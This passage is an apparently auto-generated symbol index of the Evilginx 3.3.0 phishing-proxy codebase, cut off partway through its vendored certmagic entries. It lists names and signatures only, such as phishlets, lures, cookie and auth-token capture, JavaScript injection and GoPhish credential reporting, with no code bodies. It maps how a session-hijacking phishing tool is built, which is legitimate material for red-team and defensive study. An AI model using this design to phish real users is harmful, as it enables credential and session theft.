SYMBOL INDEX (103579 symbols across 946 files) FILE: core/banner.go constant VERSION (line 11) | VERSION = "3.3.0" function putAsciiArt (line 14) | func putAsciiArt(s string) { function printLogo (line 41) | func printLogo(s string) { function printUpdateName (line 57) | func printUpdateName() { function printOneliner1 (line 63) | func printOneliner1() { function printOneliner2 (line 72) | func printOneliner2() { function Banner (line 80) | func Banner() { FILE: core/blacklist.go type BlockIP (line 13) | type BlockIP struct type Blacklist (line 18) | type Blacklist struct method GetStats (line 72) | func (bl *Blacklist) GetStats() (int, int) { method AddIP (line 76) | func (bl *Blacklist) AddIP(ip string) error { method IsBlacklisted (line 103) | func (bl *Blacklist) IsBlacklisted(ip string) bool { method SetVerbose (line 120) | func (bl *Blacklist) SetVerbose(verbose bool) { method IsVerbose (line 124) | func (bl *Blacklist) IsVerbose() bool { method IsWhitelisted (line 128) | func (bl *Blacklist) IsWhitelisted(ip string) bool { function NewBlacklist (line 25) | func NewBlacklist(path string) (*Blacklist, error) { FILE: core/certdb.go type CertDb (line 24) | type CertDb struct method GetEmail (line 64) | func (o *CertDb) GetEmail() string { method generateCertificates (line 80) | func (o *CertDb) generateCertificates() error { method setManagedSync (line 165) | func (o *CertDb) setManagedSync(hosts []string, t time.Duration) error { method setUnmanagedSync (line 172) | func (o *CertDb) setUnmanagedSync(verbose bool) error { method reloadCertificates (line 253) | func (o *CertDb) reloadCertificates() error { method getTLSCertificate (line 258) | func (o *CertDb) getTLSCertificate(host string, port int) (*x509.Certi... method getSelfSignedCertificate (line 273) | func (o *CertDb) getSelfSignedCertificate(host string, phish_host stri... function NewCertDb (line 33) | func NewCertDb(cache_dir string, cfg *Config, ns *Nameserver) (*CertDb, ... FILE: core/config.go type Lure (line 17) | type Lure struct type SubPhishlet (line 33) | type SubPhishlet struct type PhishletConfig (line 39) | type PhishletConfig struct type ProxyConfig (line 46) | type ProxyConfig struct type BlacklistConfig (line 55) | type BlacklistConfig struct type CertificatesConfig (line 59) | type CertificatesConfig struct type GoPhishConfig (line 62) | type GoPhishConfig struct type GeneralConfig (line 68) | type GeneralConfig struct type Config (line 79) | type Config struct method PhishletConfig (line 195) | func (c *Config) PhishletConfig(site string) *PhishletConfig { method SavePhishlets (line 210) | func (c *Config) SavePhishlets() { method SetSiteHostname (line 215) | func (c *Config) SetSiteHostname(site string, hostname string) bool { method SetSiteUnauthUrl (line 239) | func (c *Config) SetSiteUnauthUrl(site string, _url string) bool { method SetBaseDomain (line 262) | func (c *Config) SetBaseDomain(domain string) { method SetServerIP (line 269) | func (c *Config) SetServerIP(ip_addr string) { method SetServerExternalIP (line 276) | func (c *Config) SetServerExternalIP(ip_addr string) { method SetServerBindIP (line 283) | func (c *Config) SetServerBindIP(ip_addr string) { method SetHttpsPort (line 291) | func (c *Config) SetHttpsPort(port int) { method SetDnsPort (line 298) | func (c *Config) SetDnsPort(port int) { method EnableProxy (line 305) | func (c *Config) EnableProxy(enabled bool) { method SetProxyType (line 316) | func (c *Config) SetProxyType(ptype string) { method SetProxyAddress (line 328) | func (c *Config) SetProxyAddress(address string) { method SetProxyPort (line 335) | func (c *Config) SetProxyPort(port int) { method SetProxyUsername (line 342) | func (c *Config) SetProxyUsername(username string) { method SetProxyPassword (line 349) | func (c *Config) SetProxyPassword(password string) { method SetGoPhishAdminUrl (line 356) | func (c *Config) SetGoPhishAdminUrl(k string) { method SetGoPhishApiKey (line 369) | func (c *Config) SetGoPhishApiKey(k string) { method SetGoPhishInsecureTLS (line 376) | func (c *Config) SetGoPhishInsecureTLS(k bool) { method IsLureHostnameValid (line 383) | func (c *Config) IsLureHostnameValid(hostname string) bool { method SetSiteEnabled (line 394) | func (c *Config) SetSiteEnabled(site string) error { method SetSiteDisabled (line 415) | func (c *Config) SetSiteDisabled(site string) error { method SetSiteHidden (line 428) | func (c *Config) SetSiteHidden(site string, hide bool) error { method SetRedirectorsDir (line 445) | func (c *Config) SetRedirectorsDir(path string) { method ResetAllSites (line 449) | func (c *Config) ResetAllSites() { method IsSiteEnabled (line 454) | func (c *Config) IsSiteEnabled(site string) bool { method IsSiteHidden (line 458) | func (c *Config) IsSiteHidden(site string) bool { method GetEnabledSites (line 462) | func (c *Config) GetEnabledSites() []string { method SetBlacklistMode (line 472) | func (c *Config) SetBlacklistMode(mode string) { method SetUnauthUrl (line 481) | func (c *Config) SetUnauthUrl(_url string) { method EnableAutocert (line 488) | func (c *Config) EnableAutocert(enabled bool) { method refreshActiveHostnames (line 499) | func (c *Config) refreshActiveHostnames() { method GetActiveHostnames (line 520) | func (c *Config) GetActiveHostnames(site string) []string { method IsActiveHostname (line 545) | func (c *Config) IsActiveHostname(host string) bool { method AddPhishlet (line 558) | func (c *Config) AddPhishlet(site string, pl *Phishlet) { method AddSubPhishlet (line 564) | func (c *Config) AddSubPhishlet(site string, parent_site string, custo... method DeleteSubPhishlet (line 586) | func (c *Config) DeleteSubPhishlet(site string) error { method LoadSubPhishlets (line 602) | func (c *Config) LoadSubPhishlets() { method SaveSubPhishlets (line 613) | func (c *Config) SaveSubPhishlets() { method VerifyPhishlets (line 630) | func (c *Config) VerifyPhishlets() { method CleanUp (line 651) | func (c *Config) CleanUp() { method AddLure (line 682) | func (c *Config) AddLure(site string, l *Lure) { method SetLure (line 689) | func (c *Config) SetLure(index int, l *Lure) error { method DeleteLure (line 700) | func (c *Config) DeleteLure(index int) error { method DeleteLures (line 712) | func (c *Config) DeleteLures(index []int) []int { method GetLure (line 733) | func (c *Config) GetLure(index int) (*Lure, error) { method GetLureByPath (line 741) | func (c *Config) GetLureByPath(site string, host string, path string) ... method GetPhishlet (line 757) | func (c *Config) GetPhishlet(site string) (*Phishlet, error) { method GetPhishletNames (line 765) | func (c *Config) GetPhishletNames() []string { method GetSiteDomain (line 769) | func (c *Config) GetSiteDomain(site string) (string, bool) { method GetSiteUnauthUrl (line 776) | func (c *Config) GetSiteUnauthUrl(site string) (string, bool) { method GetBaseDomain (line 783) | func (c *Config) GetBaseDomain() string { method GetServerExternalIP (line 787) | func (c *Config) GetServerExternalIP() string { method GetServerBindIP (line 791) | func (c *Config) GetServerBindIP() string { method GetHttpsPort (line 795) | func (c *Config) GetHttpsPort() int { method GetDnsPort (line 799) | func (c *Config) GetDnsPort() int { method GetRedirectorsDir (line 803) | func (c *Config) GetRedirectorsDir() string { method GetBlacklistMode (line 807) | func (c *Config) GetBlacklistMode() string { method IsAutocertEnabled (line 811) | func (c *Config) IsAutocertEnabled() bool { method GetGoPhishAdminUrl (line 815) | func (c *Config) GetGoPhishAdminUrl() string { method GetGoPhishApiKey (line 819) | func (c *Config) GetGoPhishApiKey() string { method GetGoPhishInsecureTLS (line 823) | func (c *Config) GetGoPhishInsecureTLS() bool { constant CFG_GENERAL (line 97) | CFG_GENERAL = "general" constant CFG_CERTIFICATES (line 98) | CFG_CERTIFICATES = "certificates" constant CFG_LURES (line 99) | CFG_LURES = "lures" constant CFG_PROXY (line 100) | CFG_PROXY = "proxy" constant CFG_PHISHLETS (line 101) | CFG_PHISHLETS = "phishlets" constant CFG_BLACKLIST (line 102) | CFG_BLACKLIST = "blacklist" constant CFG_SUBPHISHLETS (line 103) | CFG_SUBPHISHLETS = "subphishlets" constant CFG_GOPHISH (line 104) | CFG_GOPHISH = "gophish" constant DEFAULT_UNAUTH_URL (line 107) | DEFAULT_UNAUTH_URL = "https://www.youtube.com/watch?v=dQw4w9WgXcQ" function NewConfig (line 109) | func NewConfig(cfg_dir string, path string) (*Config, error) { FILE: core/gophish.go type GoPhish (line 12) | type GoPhish struct method Setup (line 27) | func (o *GoPhish) Setup(adminUrl string, apiKey string, insecureTLS bo... method Test (line 43) | func (o *GoPhish) Test() error { method ReportEmailOpened (line 54) | func (o *GoPhish) ReportEmailOpened(rid string, address string, userAg... method ReportEmailLinkClicked (line 75) | func (o *GoPhish) ReportEmailLinkClicked(rid string, address string, u... method ReportCredentialsSubmitted (line 96) | func (o *GoPhish) ReportCredentialsSubmitted(rid string, address strin... method apiRequest (line 117) | func (o *GoPhish) apiRequest(reqUrl string, content []byte) error { method validateSetup (line 150) | func (o *GoPhish) validateSetup() error { type ResultRequest (line 18) | type ResultRequest struct function NewGoPhish (line 23) | func NewGoPhish() *GoPhish { FILE: core/help.go type Help (line 12) | type Help struct method AddCommand (line 39) | func (h *Help) AddCommand(cmd string, category string, cmd_help string... method AddSubCommand (line 55) | func (h *Help) AddSubCommand(cmd string, sub_cmds []string, sub_disp s... method GetCommands (line 64) | func (h *Help) GetCommands() []string { method GetPrefixCommands (line 68) | func (h *Help) GetPrefixCommands(layer int) []string { method GetPrefixCompleter (line 79) | func (h *Help) GetPrefixCompleter(layer int) *readline.PrefixCompleter { method Print (line 93) | func (h *Help) Print(layer int) { method PrintBrief (line 120) | func (h *Help) PrintBrief(cmd string) error { method helpPrefixCompleter (line 173) | func (h *Help) helpPrefixCompleter(s string) []string { function NewHelp (line 24) | func NewHelp() (*Help, error) { FILE: core/http_proxy.go constant CONVERT_TO_ORIGINAL_URLS (line 48) | CONVERT_TO_ORIGINAL_URLS = 0 constant CONVERT_TO_PHISHING_URLS (line 49) | CONVERT_TO_PHISHING_URLS = 1 constant HOME_DIR (line 53) | HOME_DIR = ".evilginx" constant httpReadTimeout (line 57) | httpReadTimeout = 45 * time.Second constant httpWriteTimeout (line 58) | httpWriteTimeout = 45 * time.Second type HttpProxy (line 65) | type HttpProxy struct method waitForRedirectUrl (line 1252) | func (p *HttpProxy) waitForRedirectUrl(session_id string) (string, boo... method blockRequest (line 1272) | func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *h... method trackerImage (line 1292) | func (p *HttpProxy) trackerImage(req *http.Request) (*http.Request, *h... method interceptRequest (line 1300) | func (p *HttpProxy) interceptRequest(req *http.Request, http_status in... method javascriptRedirect (line 1315) | func (p *HttpProxy) javascriptRedirect(req *http.Request, rurl string)... method injectJavascriptIntoBody (line 1324) | func (p *HttpProxy) injectJavascriptIntoBody(body []byte, script strin... method isForwarderUrl (line 1344) | func (p *HttpProxy) isForwarderUrl(u *url.URL) bool { method extractParams (line 1361) | func (p *HttpProxy) extractParams(session *Session, u *url.URL) bool { method replaceHtmlParams (line 1440) | func (p *HttpProxy) replaceHtmlParams(body string, lure_url string, pa... method patchUrls (line 1483) | func (p *HttpProxy) patchUrls(pl *Phishlet, body []byte, c_type int) [... method TLSConfigFromCA (line 1531) | func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.P... method setSessionUsername (line 1571) | func (p *HttpProxy) setSessionUsername(sid string, username string) { method setSessionPassword (line 1581) | func (p *HttpProxy) setSessionPassword(sid string, password string) { method setSessionCustom (line 1591) | func (p *HttpProxy) setSessionCustom(sid string, name string, value st... method httpsWorker (line 1601) | func (p *HttpProxy) httpsWorker() { method getPhishletByOrigHost (line 1656) | func (p *HttpProxy) getPhishletByOrigHost(hostname string) *Phishlet { method getPhishletByPhishHost (line 1669) | func (p *HttpProxy) getPhishletByPhishHost(hostname string) *Phishlet { method replaceHostWithOriginal (line 1698) | func (p *HttpProxy) replaceHostWithOriginal(hostname string) (string, ... method replaceHostWithPhished (line 1723) | func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, b... method replaceUrlWithPhished (line 1751) | func (p *HttpProxy) replaceUrlWithPhished(u string) (string, bool) { method getPhishDomain (line 1762) | func (p *HttpProxy) getPhishDomain(hostname string) (string, bool) { method getHomeDir (line 1791) | func (p *HttpProxy) getHomeDir() string { method getPhishSub (line 1795) | func (p *HttpProxy) getPhishSub(hostname string) (string, bool) { method handleSession (line 1812) | func (p *HttpProxy) handleSession(hostname string) bool { method injectOgHeaders (line 1838) | func (p *HttpProxy) injectOgHeaders(l *Lure, body []byte) []byte { method Start (line 1861) | func (p *HttpProxy) Start() error { method whitelistIP (line 1866) | func (p *HttpProxy) whitelistIP(ip_addr string, sid string, pl_name st... method isWhitelistedIP (line 1875) | func (p *HttpProxy) isWhitelistedIP(ip_addr string, pl_name string) bo... method getSessionIdByIP (line 1888) | func (p *HttpProxy) getSessionIdByIP(ip_addr string, hostname string) ... method setProxy (line 1900) | func (p *HttpProxy) setProxy(enabled bool, ptype string, address strin... type ProxySession (line 87) | type ProxySession struct function SetJSONVariable (line 96) | func SetJSONVariable(body []byte, key string, value interface{}) ([]byte... function NewHttpProxy (line 109) | func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb... type dumbResponseWriter (line 1943) | type dumbResponseWriter struct method Header (line 1947) | func (dumb dumbResponseWriter) Header() http.Header { method Write (line 1951) | func (dumb dumbResponseWriter) Write(buf []byte) (int, error) { method WriteHeader (line 1958) | func (dumb dumbResponseWriter) WriteHeader(code int) { method Hijack (line 1962) | func (dumb dumbResponseWriter) Hijack() (net.Conn, *bufio.ReadWriter, ... function orPanic (line 1966) | func orPanic(err error) { function getContentType (line 1972) | func getContentType(path string, data []byte) string { function getSessionCookieName (line 1984) | func getSessionCookieName(pl_name string, cookie_name string) string { FILE: core/http_server.go type HttpServer (line 11) | type HttpServer struct method Start (line 34) | func (s *HttpServer) Start() { method AddACMEToken (line 38) | func (s *HttpServer) AddACMEToken(token string, keyAuth string) { method ClearACMETokens (line 42) | func (s *HttpServer) ClearACMETokens() { method handleACMEChallenge (line 46) | func (s *HttpServer) handleACMEChallenge(w http.ResponseWriter, r *htt... method handleRedirect (line 62) | func (s *HttpServer) handleRedirect(w http.ResponseWriter, r *http.Req... function NewHttpServer (line 16) | func NewHttpServer() (*HttpServer, error) { FILE: core/nameserver.go type Nameserver (line 16) | type Nameserver struct method Reset (line 37) | func (o *Nameserver) Reset() { method Start (line 41) | func (o *Nameserver) Start() { method handleRequest (line 50) | func (o *Nameserver) handleRequest(w dns.ResponseWriter, r *dns.Msg) { function NewNameserver (line 24) | func NewNameserver(cfg *Config) (*Nameserver, error) { function pdom (line 98) | func pdom(domain string) string { FILE: core/phishlet.go type ProxyHost (line 15) | type ProxyHost struct type SubFilter (line 24) | type SubFilter struct type CookieAuthToken (line 34) | type CookieAuthToken struct type BodyAuthToken (line 43) | type BodyAuthToken struct type HttpAuthToken (line 50) | type HttpAuthToken struct type PhishletVersion (line 57) | type PhishletVersion struct type PostField (line 63) | type PostField struct type ForcePostSearch (line 70) | type ForcePostSearch struct type ForcePostForce (line 75) | type ForcePostForce struct type ForcePost (line 80) | type ForcePost struct type LoginUrl (line 87) | type LoginUrl struct type JsInject (line 92) | type JsInject struct type Intercept (line 100) | type Intercept struct type Phishlet (line 108) | type Phishlet struct method Clear (line 250) | func (p *Phishlet) Clear() { method LoadFromFile (line 271) | func (p *Phishlet) LoadFromFile(site string, path string, customParams... method GetPhishHosts (line 764) | func (p *Phishlet) GetPhishHosts(use_wildcards bool) []string { method GetLureUrl (line 779) | func (p *Phishlet) GetLureUrl(path string) (string, error) { method GetLoginUrl (line 794) | func (p *Phishlet) GetLoginUrl() string { method GetLandingPhishHost (line 798) | func (p *Phishlet) GetLandingPhishHost() string { method GetScriptInject (line 810) | func (p *Phishlet) GetScriptInject(hostname string, path string, param... method GetScriptInjectById (line 858) | func (p *Phishlet) GetScriptInjectById(id string, params *map[string]s... method GenerateTokenSet (line 874) | func (p *Phishlet) GenerateTokenSet(tokens map[string]string) map[stri... method addProxyHost (line 892) | func (p *Phishlet) addProxyHost(phish_subdomain string, orig_subdomain... method addSubFilter (line 903) | func (p *Phishlet) addSubFilter(hostname string, subdomain string, dom... method addCookieAuthTokens (line 913) | func (p *Phishlet) addCookieAuthTokens(hostname string, tokens []strin... method addBodyAuthToken (line 949) | func (p *Phishlet) addBodyAuthToken(hostname string, path string, name... method addHttpAuthToken (line 969) | func (p *Phishlet) addHttpAuthToken(hostname string, path string, name... method addJsInject (line 985) | func (p *Phishlet) addJsInject(trigger_domains []string, trigger_paths... method addIntercept (line 1009) | func (p *Phishlet) addIntercept(domain string, path *regexp.Regexp, ht... method domainExists (line 1021) | func (p *Phishlet) domainExists(domain string) bool { method getAuthToken (line 1030) | func (p *Phishlet) getAuthToken(domain string, token string) *CookieAu... method isAuthToken (line 1045) | func (p *Phishlet) isAuthToken(domain string, token string) bool { method isTokenHttpOnly (line 1052) | func (p *Phishlet) isTokenHttpOnly(domain string, token string) bool { method MimeExists (line 1059) | func (p *Phishlet) MimeExists(mime string) bool { method isVersionHigherEqual (line 1063) | func (p *Phishlet) isVersionHigherEqual(pv *PhishletVersion, cver stri... method parseVersion (line 1078) | func (p *Phishlet) parseVersion(ver string) (PhishletVersion, error) { method paramVal (line 1100) | func (p *Phishlet) paramVal(s string) string { type ConfigParam (line 136) | type ConfigParam struct type ConfigProxyHost (line 142) | type ConfigProxyHost struct type ConfigSubFilter (line 151) | type ConfigSubFilter struct type ConfigAuthToken (line 162) | type ConfigAuthToken struct type ConfigPostField (line 172) | type ConfigPostField struct type ConfigCredentials (line 178) | type ConfigCredentials struct type ConfigForcePostSearch (line 184) | type ConfigForcePostSearch struct type ConfigForcePostForce (line 189) | type ConfigForcePostForce struct type ConfigForcePost (line 194) | type ConfigForcePost struct type ConfigLogin (line 201) | type ConfigLogin struct type ConfigJsInject (line 206) | type ConfigJsInject struct type ConfigIntercept (line 213) | type ConfigIntercept struct type ConfigPhishlet (line 221) | type ConfigPhishlet struct function NewPhishlet (line 237) | func NewPhishlet(site string, path string, customParams *map[string]stri... FILE: core/scripts.go constant DYNAMIC_REDIRECT_JS (line 3) | DYNAMIC_REDIRECT_JS = ` FILE: core/session.go type Session (line 9) | type Session struct method SetUsername (line 61) | func (s *Session) SetUsername(username string) { method SetPassword (line 65) | func (s *Session) SetPassword(password string) { method SetCustom (line 69) | func (s *Session) SetCustom(name string, value string) { method AddCookieAuthToken (line 73) | func (s *Session) AddCookieAuthToken(domain string, key string, value ... method AllCookieAuthTokensCaptured (line 93) | func (s *Session) AllCookieAuthTokensCaptured(authTokens map[string][]... method Finish (line 132) | func (s *Session) Finish(is_auth_url bool) { function NewSession (line 33) | func NewSession(name string) (*Session, error) { FILE: core/shared.go function combineHost (line 5) | func combineHost(sub string, domain string) string { function obfuscateDots (line 12) | func obfuscateDots(s string) string { function removeObfuscatedDots (line 16) | func removeObfuscatedDots(s string) string { function stringExists (line 20) | func stringExists(s string, sa []string) bool { function intExists (line 29) | func intExists(i int, ia []int) bool { function removeString (line 38) | func removeString(s string, sa []string) []string { function truncateString (line 47) | func truncateString(s string, maxLen int) string { FILE: core/table.go function viewLen (line 19) | func viewLen(s string) int { function truncString (line 27) | func truncString(s string, maxLen int) string { function maxLen (line 45) | func maxLen(strings []string) int { type Alignment (line 56) | type Alignment constant AlignLeft (line 59) | AlignLeft = Alignment(0) constant AlignCenter (line 60) | AlignCenter = Alignment(1) constant AlignRight (line 61) | AlignRight = Alignment(2) constant minColLen (line 64) | minColLen = 16 function getPads (line 66) | func getPads(s string, maxLen int, align Alignment) (lPad int, rPad int) { function padded (line 84) | func padded(s string, maxLen int, align Alignment) string { function AsTable (line 89) | func AsTable(columns []string, rows [][]string) string { function AsRows (line 147) | func AsRows(keys []string, vals []string) string { function AsDescription (line 157) | func AsDescription(keys []string, vals []string) string { FILE: core/terminal.go constant DEFAULT_PROMPT (line 31) | DEFAULT_PROMPT = ": " constant LAYER_TOP (line 32) | LAYER_TOP = 1 type Terminal (line 35) | type Terminal struct method Close (line 72) | func (t *Terminal) Close() { method output (line 76) | func (t *Terminal) output(s string, args ...interface{}) { method DoWork (line 81) | func (t *Terminal) DoWork() { method handleConfig (line 182) | func (t *Terminal) handleConfig(args []string) error { method handleBlacklist (line 276) | func (t *Terminal) handleBlacklist(args []string) error { method handleProxy (line 318) | func (t *Terminal) handleProxy(args []string) error { method handleSessions (line 389) | func (t *Terminal) handleSessions(args []string) error { method handlePhishlets (line 563) | func (t *Terminal) handlePhishlets(args []string) error { method handleLures (line 702) | func (t *Terminal) handleLures(args []string) error { method monitorLurePause (line 1134) | func (t *Terminal) monitorLurePause() { method createHelp (line 1161) | func (t *Terminal) createHelp() { method cookieTokensToJSON (line 1259) | func (t *Terminal) cookieTokensToJSON(tokens map[string]map[string]*da... method tokensToJSON (line 1307) | func (t *Terminal) tokensToJSON(tokens map[string]string) string { method checkStatus (line 1316) | func (t *Terminal) checkStatus() { method manageCertificates (line 1325) | func (t *Terminal) manageCertificates(verbose bool) { method sprintPhishletStatus (line 1355) | func (t *Terminal) sprintPhishletStatus(site string) string { method sprintIsEnabled (line 1419) | func (t *Terminal) sprintIsEnabled(enabled bool) string { method sprintLures (line 1430) | func (t *Terminal) sprintLures() string { method phishletPrefixCompleter (line 1470) | func (t *Terminal) phishletPrefixCompleter(args string) []string { method redirectorsPrefixCompleter (line 1474) | func (t *Terminal) redirectorsPrefixCompleter(args string) []string { method luresIdPrefixCompleter (line 1504) | func (t *Terminal) luresIdPrefixCompleter(args string) []string { method importParamsFromFile (line 1512) | func (t *Terminal) importParamsFromFile(base_url string, path string) ... method exportPhishUrls (line 1665) | func (t *Terminal) exportPhishUrls(export_path string, phish_urls []st... method createPhishUrl (line 1765) | func (t *Terminal) createPhishUrl(base_url string, params *url.Values)... method sprintVar (line 1789) | func (t *Terminal) sprintVar(k string, v string) string { method filterInput (line 1794) | func (t *Terminal) filterInput(r rune) (rune, bool) { function NewTerminal (line 46) | func NewTerminal(p *HttpProxy, cfg *Config, crt_db *CertDb, db *database... FILE: core/utils.go function GenRandomToken (line 15) | func GenRandomToken() string { function GenRandomString (line 23) | func GenRandomString(n int) string { function GenRandomAlphanumString (line 34) | func GenRandomAlphanumString(n int) string { function CreateDir (line 45) | func CreateDir(path string, perm os.FileMode) error { function ReadFromFile (line 55) | func ReadFromFile(path string) ([]byte, error) { function SaveToFile (line 68) | func SaveToFile(b []byte, fpath string, perm fs.FileMode) error { function ParseDurationString (line 82) | func ParseDurationString(s string) (t_dur time.Duration, err error) { function GetDurationString (line 134) | func GetDurationString(t_now time.Time, t_expire time.Time) (ret string) { FILE: database/database.go type Database (line 10) | type Database struct method CreateSession (line 32) | func (d *Database) CreateSession(sid string, phishlet string, landing_... method ListSessions (line 37) | func (d *Database) ListSessions() ([]*Session, error) { method SetSessionUsername (line 42) | func (d *Database) SetSessionUsername(sid string, username string) err... method SetSessionPassword (line 47) | func (d *Database) SetSessionPassword(sid string, password string) err... method SetSessionCustom (line 52) | func (d *Database) SetSessionCustom(sid string, name string, value str... method SetSessionBodyTokens (line 57) | func (d *Database) SetSessionBodyTokens(sid string, tokens map[string]... method SetSessionHttpTokens (line 62) | func (d *Database) SetSessionHttpTokens(sid string, tokens map[string]... method SetSessionCookieTokens (line 67) | func (d *Database) SetSessionCookieTokens(sid string, tokens map[strin... method DeleteSession (line 72) | func (d *Database) DeleteSession(sid string) error { method DeleteSessionById (line 81) | func (d *Database) DeleteSessionById(id int) error { method Flush (line 90) | func (d *Database) Flush() { method genIndex (line 94) | func (d *Database) genIndex(table_name string, id int) string { method getLastId (line 98) | func (d *Database) getLastId(table_name string) (int, error) { method getNextId (line 114) | func (d *Database) getNextId(table_name string) (int, error) { method getPivot (line 130) | func (d *Database) getPivot(t interface{}) string { function NewDatabase (line 15) | func NewDatabase(path string) (*Database, error) { FILE: database/db_session.go constant SessionTable (line 11) | SessionTable = "sessions" type Session (line 13) | type Session struct type CookieToken (line 30) | type CookieToken struct method sessionsInit (line 37) | func (d *Database) sessionsInit() { method sessionsCreate (line 42) | func (d *Database) sessionsCreate(sid string, phishlet string, landing_u... method sessionsList (line 79) | func (d *Database) sessionsList() ([]*Session, error) { method sessionsUpdateUsername (line 97) | func (d *Database) sessionsUpdateUsername(sid string, username string) e... method sessionsUpdatePassword (line 109) | func (d *Database) sessionsUpdatePassword(sid string, password string) e... method sessionsUpdateCustom (line 121) | func (d *Database) sessionsUpdateCustom(sid string, name string, value s... method sessionsUpdateBodyTokens (line 133) | func (d *Database) sessionsUpdateBodyTokens(sid string, tokens map[strin... method sessionsUpdateHttpTokens (line 145) | func (d *Database) sessionsUpdateHttpTokens(sid string, tokens map[strin... method sessionsUpdateCookieTokens (line 157) | func (d *Database) sessionsUpdateCookieTokens(sid string, tokens map[str... method sessionsUpdate (line 169) | func (d *Database) sessionsUpdate(id int, s *Session) error { method sessionsDelete (line 179) | func (d *Database) sessionsDelete(id int) error { method sessionsGetById (line 187) | func (d *Database) sessionsGetById(id int) (*Session, error) { method sessionsGetBySid (line 207) | func (d *Database) sessionsGetBySid(sid string) (*Session, error) { FILE: log/log.go constant DEBUG (line 20) | DEBUG = iota constant INFO (line 21) | INFO constant IMPORTANT (line 22) | IMPORTANT constant WARNING (line 23) | WARNING constant ERROR (line 24) | ERROR constant FATAL (line 25) | FATAL constant SUCCESS (line 26) | SUCCESS function DebugEnable (line 39) | func DebugEnable(enable bool) { function SetOutput (line 43) | func SetOutput(o io.Writer) { function SetReadline (line 47) | func SetReadline(rl *readline.Instance) { function GetOutput (line 51) | func GetOutput() io.Writer { function NullLogger (line 55) | func NullLogger() *log.Logger { function refreshReadline (line 59) | func refreshReadline() { function Debug (line 65) | func Debug(format string, args ...interface{}) { function Info (line 75) | func Info(format string, args ...interface{}) { function Important (line 83) | func Important(format string, args ...interface{}) { function Warning (line 91) | func Warning(format string, args ...interface{}) { function Error (line 99) | func Error(format string, args ...interface{}) { function Fatal (line 107) | func Fatal(format string, args ...interface{}) { function Success (line 115) | func Success(format string, args ...interface{}) { function Printf (line 123) | func Printf(format string, args ...interface{}) { function format_msg (line 131) | func format_msg(lvl int, format string, args ...interface{}) string { FILE: main.go function joinPath (line 28) | func joinPath(base_path string, rel_path string) string { function showEvilginxProAd (line 38) | func showEvilginxProAd() { function showEvilginxMasteryAd (line 46) | func showEvilginxMasteryAd() { function main (line 54) | func main() { FILE: parser/parser.go function isSpace (line 12) | func isSpace(r rune) bool { type Parser (line 20) | type Parser struct method Parse (line 27) | func (p *Parser) Parse(line string) ([]string, error) { function NewParser (line 23) | func NewParser() *Parser { function Parse (line 91) | func Parse(line string) ([]string, error) { FILE: vendor/github.com/caddyserver/certmagic/account.go method getAccount (line 40) | func (am *ACMEIssuer) getAccount(ctx context.Context, ca, email string) ... method loadAccount (line 49) | func (am *ACMEIssuer) loadAccount(ctx context.Context, ca, email string)... method newAccount (line 74) | func (*ACMEIssuer) newAccount(email string) (acme.Account, error) { method GetAccount (line 90) | func (am *ACMEIssuer) GetAccount(ctx context.Context, privateKeyPEM []by... method loadAccountByKey (line 101) | func (am *ACMEIssuer) loadAccountByKey(ctx context.Context, privateKeyPE... method lookUpAccount (line 121) | func (am *ACMEIssuer) lookUpAccount(ctx context.Context, privateKeyPEM [... method saveAccount (line 150) | func (am *ACMEIssuer) saveAccount(ctx context.Context, ca string, accoun... method setEmail (line 181) | func (am *ACMEIssuer) setEmail(ctx context.Context, allowPrompts bool) e... method promptUserForEmail (line 237) | func (am *ACMEIssuer) promptUserForEmail() (string, error) { method promptUserAgreement (line 256) | func (am *ACMEIssuer) promptUserAgreement(agreementURL string) { method askUserAgreement (line 269) | func (am *ACMEIssuer) askUserAgreement(agreementURL string) bool { function storageKeyACMECAPrefix (line 283) | func storageKeyACMECAPrefix(issuerKey string) string { method storageKeyCAPrefix (line 287) | func (am *ACMEIssuer) storageKeyCAPrefix(caURL string) string { method storageKeyUsersPrefix (line 291) | func (am *ACMEIssuer) storageKeyUsersPrefix(caURL string) string { method storageKeyUserPrefix (line 295) | func (am *ACMEIssuer) storageKeyUserPrefix(caURL, email string) string { method storageKeyUserReg (line 302) | func (am *ACMEIssuer) storageKeyUserReg(caURL, email string) string { method storageKeyUserPrivateKey (line 306) | func (am *ACMEIssuer) storageKeyUserPrivateKey(caURL, email string) stri... method storageSafeUserKey (line 312) | func (am *ACMEIssuer) storageSafeUserKey(ca, email, defaultFilename, ext... method emailUsername (line 327) | func (*ACMEIssuer) emailUsername(email string) string { method mostRecentAccountEmail (line 341) | func (am *ACMEIssuer) mostRecentAccountEmail(ctx context.Context, caURL ... function getPrimaryContact (line 390) | func getPrimaryContact(account acme.Account) string { constant emptyEmail (line 417) | emptyEmail = "default" FILE: vendor/github.com/caddyserver/certmagic/acmeclient.go function init (line 34) | func init() { type acmeClient (line 41) | type acmeClient struct method throttle (line 251) | func (c *acmeClient) throttle(ctx context.Context, names []string) err... method usingTestCA (line 281) | func (c *acmeClient) usingTestCA() bool { method revoke (line 285) | func (c *acmeClient) revoke(ctx context.Context, cert *x509.Certificat... method newACMEClientWithAccount (line 50) | func (iss *ACMEIssuer) newACMEClientWithAccount(ctx context.Context, use... method newACMEClient (line 143) | func (iss *ACMEIssuer) newACMEClient(useTestCA bool) (*acmez.Client, err... function buildUAString (line 290) | func buildUAString() string { FILE: vendor/github.com/caddyserver/certmagic/acmeissuer.go type ACMEIssuer (line 29) | type ACMEIssuer struct method IssuerKey (line 259) | func (am *ACMEIssuer) IssuerKey() string { method issuerKey (line 263) | func (*ACMEIssuer) issuerKey(ca string) string { method getEmail (line 285) | func (iss *ACMEIssuer) getEmail() string { method isAgreed (line 291) | func (iss *ACMEIssuer) isAgreed() bool { method PreCheck (line 301) | func (am *ACMEIssuer) PreCheck(ctx context.Context, names []string, in... method Issue (line 315) | func (am *ACMEIssuer) Issue(ctx context.Context, csr *x509.Certificate... method doIssue (line 381) | func (am *ACMEIssuer) doIssue(ctx context.Context, csr *x509.Certifica... method selectPreferredChain (line 417) | func (am *ACMEIssuer) selectPreferredChain(certChains []acme.Certifica... method Revoke (line 487) | func (am *ACMEIssuer) Revoke(ctx context.Context, cert CertificateReso... function NewACMEIssuer (line 146) | func NewACMEIssuer(cfg *Config, template ACMEIssuer) *ACMEIssuer { type ChainPreference (line 504) | type ChainPreference struct constant LetsEncryptStagingCA (line 528) | LetsEncryptStagingCA = "https://acme-staging-v02.api.letsencrypt.org/... constant 